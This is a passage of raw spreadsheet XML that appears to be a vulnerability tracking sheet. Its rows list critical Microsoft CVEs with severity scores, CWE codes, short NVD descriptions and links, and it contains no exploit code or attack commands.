s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O23" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P23" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q23" s="5" t="inlineStr" /><c r="R23" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S23" s="5" t="inlineStr"><is><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is></c><c r="T23" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-61516</t></is></c></row><row r="24"><c r="A24" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B24" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C24" s="5" t="inlineStr"><is><t>CVE-2026-66302</t></is></c><c r="D24" s="5" t="n"><v>9.800000000000001</v></c><c r="E24" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F24" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G24" s="5" t="inlineStr" /><c r="H24" s="5" t="n"><v>0.005</v></c><c r="I24" s="5" t="inlineStr" /><c r="J24" s="5" t="inlineStr" /><c r="K24" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L24" s="5" t="inlineStr" /><c r="M24" s="5" t="inlineStr" /><c r="N24" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O24" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P24" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q24" s="5" t="inlineStr" /><c r="R24" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="S24" s="5" t="inlineStr"><is><t>External control of file name or path in Skype for Business allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T24" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66302</t></is></c></row><row r="25"><c r="A25" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B25" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C25" s="5" t="inlineStr"><is><t>CVE-2026-68839</t></is></c><c r="D25" s="5" t="n"><v>9.800000000000001</v></c><c r="E25" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F25" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G25" s="5" t="inlineStr" /><c r="H25" s="5" t="n"><v>0.008</v></c><c r="I25" s="5" t="inlineStr" /><c r="J25" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2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 s="5" t="inlineStr" /><c r="M25" s="5" t="inlineStr" /><c r="N25" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O25" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P25" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q25" s="5" t="inlineStr" /><c r="R25" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S25" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Mass Storage Class Driver allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T25" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68839</t></is></c></row><row r="26"><c r="A26" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B26" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C26" s="5" t="inlineStr"><is><t>CVE-2026-69276</t></is></c><c r="D26" s="5" t="n"><v>9.800000000000001</v></c><c r="E26" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F26" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G26" s="5" t="inlineStr" /><c r="H26" s="5" t="n"><v>0.008999999999999999</v></c><c r="I26" s="5" t="inlineStr" /><c r="J26" s="5" t="inlineStr" /><c r="K26" s="5" t="inlineStr" /><c r="L26" s="5" t="inlineStr" /><c r="M26" s="5" t="inlineStr" /><c r="N26" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O26" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P26" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q26" s="5" t="inlineStr" /><c r="R26" s="5" t="inlineStr"><is><t>CWE-122, CWE-191</t></is></c><c r="S26" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Microsoft UxTheme Library (uxtheme.dll) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T26" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69276</t></is></c></row><row r="27"><c r="A27" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B27" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C27" s="5" t="inlineStr"><is><t>CVE-2026-69408</t></is></c><c r="D27" s="5" t="n"><v>9.800000000000001</v></c><c r="E27" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F27" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G27" s="5" t="inlineStr" /><c r="H27" s="5" t="n"><v>0.01</v></c><c r="I27" s="5" t="inlineStr" /><c r="J27" s="5" t="inlineStr" /><c r="K27" s="5" t="inlineStr" /><c r="L27" s="5" t="inlineStr" /><c r="M27" s="5" t="inlineStr" /><c r="N27" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O27" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P27" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q27" s="5" t="inlineStr" /><c r="R27" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S27" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T27" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69408</t></is></c></row><row r="28"><c r="A28" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B28" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C28" s="5" t="inlineStr"><is><t>CVE-2026-69431</t></is></c><c r="D28" s="5" t="n"><v>9.800000000000001</v></c><c r="E28" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F28" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G28" s="5" t="inlineStr" /><c r="H28" s="5" t="n"><v>0.008999999999999999</v></c><c r="I28" s="5" t="inlineStr" /><c r="J28" s="5" t="inlineStr" /><c r="K28" s="5" t="inlineStr" /><c r="L28" s="5" t="inlineStr" /><c r="M28" s="5" t="inlineStr" /><c r="N28" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O28" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P28" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q28" s="5" t="inlineStr" /><c r="R28" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S28" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T28" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69431</t></is></c></row><row r="29"><c r="A29" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B29" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C29" s="5" t="inlineStr"><is><t>CVE-2026-69463</t></is></c><c r="D29" s="5" t="n"><v>9.800000000000001</v></c><c r="E29" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F29" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G29" s="5" t="inlineStr" /><c r="H29" s="5" t="n"><v>0.008999999999999999</v></c><c r="I29" s="5" t="inlineStr" /><c r="J29" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K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9" s="5" t="inlineStr" /><c r="M29" s="5" t="inlineStr" /><c r="N29" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O29" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P29" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q29" s="5" t="inlineStr" /><c r="R29" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S29" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T29" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69463</t></is></c></row><row r="30"><c r="A30" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B30" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C30" s="5" t="inlineStr"><is><t>CVE-2026-69491</t></is></c><c r="D30" s="5" t="n"><v>9.800000000000001</v></c><c r="E30" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F30" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G30" s="5" t="inlineStr" /><c r="H30" s="5" t="n"><v>0.008999999999999999</v></c><c r="I30" s="5" t="inlineStr" /><c r="J30" s="5" t="inlineStr" /><c r="K30" s="5" t="inlineStr" /><c r="L30" s="5" t="inlineStr" /><c r="M30" s="5" t="inlineStr" /><c r="N30" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O30" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P30" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q30" s="5" t="inlineStr" /><c r="R30" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S30" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Microsoft DirectMusic allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T30" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69491</t></is></c></row><row r="31"><c r="A31" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B31" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C31" s="5" t="inlineStr"><is><t>CVE-2026-69493</t></is></c><c r="D31" s="5" t="n"><v>9.800000000000001</v></c><c r="E31" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F31" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G31" s="5" t="inlineStr" /><c r="H31" s="5" t="n"><v>0.01</v></c><c r="I31" s="5" t="inlineStr" /><c r="J31" s="5" t="inlineStr" /><c r="K31" s="5" t="inlineStr" /><c r="L31" s="5" t="inlineStr" /><c r="M31" s="5" t="inlineStr" /><c r="N31" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O31" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P31" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q31" s="5" t="inlineStr" /><c r="R31" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S31" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T31" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69493</t></is></c></row><row r="32"><c r="A32" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B32" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C32" s="5" t="inlineStr"><is><t>CVE-2026-69496</t></is></c><c r="D32" s="5" t="n"><v>9.800000000000001</v></c><c r="E32" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F32" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G32" s="5" t="inlineStr" /><c r="H32" s="5" t="n"><v>0.01</v></c><c r="I32" s="5" t="inlineStr" /><c r="J32" s="5" t="inlineStr" /><c r="K32" s="5" t="inlineStr" /><c r="L32" s="5" t="inlineStr" /><c r="M32" s="5" t="inlineStr" /><c r="N32" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O32" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P32" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q32" s="5" t="inlineStr" /><c r="R32" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S32" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Compressed Folder allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T32" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69496</t></is></c></row><row r="33"><c r="A33" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B33" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C33" s="5" t="inlineStr"><is><t>CVE-2026-69525</t></is></c><c r="D33" s="5" t="n"><v>9.800000000000001</v></c><c r="E33" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F33" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G33" s="5" t="inlineStr" /><c r="H33" s="5" t="n"><v>0.01</v></c><c r="I33" s="5" t="inlineStr" /><c r="J33" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K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3" s="5" t="inlineStr" /><c r="M33" s="5" t="inlineStr" /><c r="N33" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O33" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P33" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q33" s="5" t="inlineStr" /><c r="R33" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S33" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Services allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T33" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69525</t></is></c></row><row r="34"><c r="A34" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B34" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C34" s="5" t="inlineStr"><is><t>CVE-2026-69579</t></is></c><c r="D34" s="5" t="n"><v>9.800000000000001</v></c><c r="E34" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F34" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G34" s="5" t="inlineStr" /><c r="H34" s="5" t="n"><v>0.01</v></c><c r="I34" s="5" t="inlineStr" /><c r="J34" s="5" t="inlineStr" /><c r="K34" s="5" t="inlineStr" /><c r="L34" s="5" t="inlineStr" /><c r="M34" s="5" t="inlineStr" /><c r="N34" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O34" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P34" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q34" s="5" t="inlineStr" /><c r="R34" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S34" s="5" t="inlineStr"><is><t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T34" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69579</t></is></c></row><row r="35"><c r="A35" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B35" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C35" s="5" t="inlineStr"><is><t>CVE-2026-69586</t></is></c><c r="D35" s="5" t="n"><v>9.800000000000001</v></c><c r="E35" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F35" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G35" s="5" t="inlineStr" /><c r="H35" s="5" t="n"><v>0.01</v></c><c r="I35" s="5" t="inlineStr" /><c r="J35" s="5" t="inlineStr" /><c r="K35" s="5" t="inlineStr" /><c r="L35" s="5" t="inlineStr" /><c r="M35" s="5" t="inlineStr" /><c r="N35" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O35" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P35" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q35" s="5" t="inlineStr" /><c r="R35" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S35" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Windows PDF allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T35" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69586</t></is></c></row><row r="36"><c r="A36" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B36" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C36" s="5" t="inlineStr"><is><t>CVE-2026-69590</t></is></c><c r="D36" s="5" t="n"><v>9.800000000000001</v></c><c r="E36" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F36" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G36" s="5" t="inlineStr" /><c r="H36" s="5" t="n"><v>0.01</v></c><c r="I36" s="5" t="inlineStr" /><c r="J36" s="5" t="inlineStr" /><c r="K36" s="5" t="inlineStr" /><c r="L36" s="5" t="inlineStr" /><c r="M36" s="5" t="inlineStr" /><c r="N36" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O36" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P36" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q36" s="5" t="inlineStr" /><c r="R36" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S36" s="5" t="inlineStr"><is><t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t></is></c><c r="T36" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69590</t></is></c></row><row r="37"><c r="A37" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B37" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C37" s="5" t="inlineStr"><is><t>CVE-2026-69595</t></is></c><c r="D37" s="5" t="n"><v>9.800000000000001</v></c><c r="E37" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F37" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G37" s="5" t="inlineStr" /><c r="H37" s="5" t="n"><v>0.011</v></c><c r="I37" s="5" t="inlineStr" /><c r="J37" s="5" t="inlineStr" /><c r="K37" s="5" t="inlineStr" /><c r="L37" s="5" t="inlineStr" /><c r="M37" s="5" t="inlineStr" /><c r="N37" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O37" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P37" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q37" s="5" t="inlineStr" /><c r="R37" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S37" s="5" t="inlineStr"><is><t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T37" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69595</t></is></c></row><row r="38"><c r="A38" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B38" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C38" s="5" t="inlineStr"><is><t>CVE-2026-69715</t></is></c><c r="D38" s="5" t="n"><v>9.800000000000001</v></c><c r="E38" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F38" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G38" s="5" t="inlineStr" /><c r="H38" s="5" t="n"><v>0.01</v></c><c r="I38" s="5" t="inlineStr" /><c r="J38" s="5" t="inlineStr" /><c r="K38" s="5" t="inlineStr" /><c r="L38" s="5" t="inlineStr" /><c r="M38" s="5" t="inlineStr" /><c r="N38" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O38" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P38" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q38" s="5" t="inlineStr" /><c r="R38" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S38" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Direct Show allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T38" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69715</t></is></c></row><row r="39"><c r="A39" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B39" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C39" s="5" t="inlineStr"><is><t>CVE-2026-69730</t></is></c><c r="D39" s="5" t="n"><v>9.800000000000001</v></c><c r="E39" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F39" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G39" s="5" t="inlineStr" /><c r="H39" s="5" t="n"><v>0.011</v></c><c r="I39" s="5" t="inlineStr" /><c r="J39" s="5" t="inlineStr" /><c r="K39" s="5" t="inlineStr" /><c r="L39" s="5" t="inlineStr" /><c r="M39" s="5" t="inlineStr" /><c r="N39" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O39" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P39" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q39" s="5" t="inlineStr" /><c r="R39" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S39" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T39" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69730</t></is></c></row><row r="40"><c r="A40" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B40" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C40" s="5" t="inlineStr"><is><t>CVE-2026-69768</t></is></c><c r="D40" s="5" t="n"><v>9.800000000000001</v></c><c r="E40" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F40" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G40" s="5" t="inlineStr" /><c r="H40" s="5" t="n"><v>0.008999999999999999</v></c><c r="I40" s="5" t="inlineStr" /><c r="J40" s="5" t="inlineStr" /><c r="K40" s="5" t="inlineStr" /><c r="L40" s="5" t="inlineStr" /><c r="M40" s="5" t="inlineStr" /><c r="N40" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O40" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P40" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q40" s="5" t="inlineStr" /><c r="R40" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S40" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows RNDIS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T40" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69768</t></is></c></row><row r="41"><c r="A41" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B41" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C41" s="5" t="inlineStr"><is><t>CVE-2026-69769</t></is></c><c r="D41" s="5" t="n"><v>9.800000000000001</v></c><c r="E41" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F41" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G41" s="5" t="inlineStr" /><c r="H41" s="5" t="n"><v>0.008999999999999999</v></c><c r="I41" s="5" t="inlineStr" /><c r="J41" s="5" t="inlineStr" /><c r="K41" s="5" t="inlineStr" /><c r="L41" s="5" t="inlineStr" /><c r="M41" s="5" t="inlineStr" /><c r="N41" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O41" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P41" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q41" s="5" t="inlineStr" /><c r="R41" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S41" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T41" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69769</t></is></c></row><row r="42"><c r="A42" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B42" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C42" s="5" t="inlineStr"><is><t>CVE-2026-69819</t></is></c><c r="D42" s="5" t="n"><v>9.800000000000001</v></c><c r="E42" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F42" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G42" s="5" t="inlineStr" /><c r="H42" s="5" t="n"><v>0.008999999999999999</v></c><c r="I42" s="5" t="inlineStr" /><c r="J42" s="5" t="inlineStr" /><c r="K42" s="5" t="inlineStr" /><c r="L42" s="5" t="inlineStr" /><c r="M42" s="5" t="inlineStr" /><c r="N42" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O42" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P42" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q42" s="5" t="inlineStr" /><c r="R42" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S42" s="5" t="inlineStr"><is><t>Out-of-bounds write in RPC Runtime allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T42" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69819</t></is></c></row><row r="43"><c r="A43" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B43" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C43" s="5" t="inlineStr"><is><t>CVE-2026-69824</t></is></c><c r="D43" s="5" t="n"><v>9.800000000000001</v></c><c r="E43" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F43" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G43" s="5" t="inlineStr" /><c r="H43" s="5" t="n"><v>0.01</v></c><c r="I43" s="5" t="inlineStr" /><c r="J43" s="5" t="inlineStr" /><c r="K43" s="5" t="inlineStr" /><c r="L43" s="5" t="inlineStr" /><c r="M43" s="5" t="inlineStr" /><c r="N43" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O43" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P43" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q43" s="5" t="inlineStr" /><c r="R43" s="5" t="inlineStr"><is><t>CWE-122, CWE-191</t></is></c><c r="S43" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Microsoft Standard XPS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T43" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69824</t></is></c></row><row r="44"><c r="A44" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B44" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C44" s="5" t="inlineStr"><is><t>CVE-2026-69829</t></is></c><c r="D44" s="5" t="n"><v>9.800000000000001</v></c><c r="E44" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F44" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G44" s="5" t="inlineStr" /><c r="H44" s="5" t="n"><v>0.011</v></c><c r="I44" s="5" t="inlineStr" /><c r="J44" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K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4" s="5" t="inlineStr" /><c r="M44" s="5" t="inlineStr" /><c r="N44" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O44" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P44" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q44" s="5" t="inlineStr" /><c r="R44" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S44" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Shell allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T44" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69829</t></is></c></row><row r="45"><c r="A45" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B45" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C45" s="5" t="inlineStr"><is><t>CVE-2026-69845</t></is></c><c r="D45" s="5" t="n"><v>9.800000000000001</v></c><c r="E45" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F45" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G45" s="5" t="inlineStr" /><c r="H45" s="5" t="n"><v>0.008999999999999999</v></c><c r="I45" s="5" t="inlineStr" /><c r="J45" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K45" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L45" s="5" t="inlineStr" /><c r="M45" s="5" t="inlineStr" /><c r="N45" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O45" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P45" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q45" s="5" t="inlineStr" /><c r="R45" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S45" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T45" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69845</t></is></c></row><row r="46"><c r="A46" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B46" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C46" s="5" t="inlineStr"><is><t>CVE-2026-69910</t></is></c><c r="D46" s="5" t="n"><v>9.800000000000001</v></c><c r="E46" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F46" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G46" s="5" t="inlineStr" /><c r="H46" s="5" t="n"><v>0.01</v></c><c r="I46" s="5" 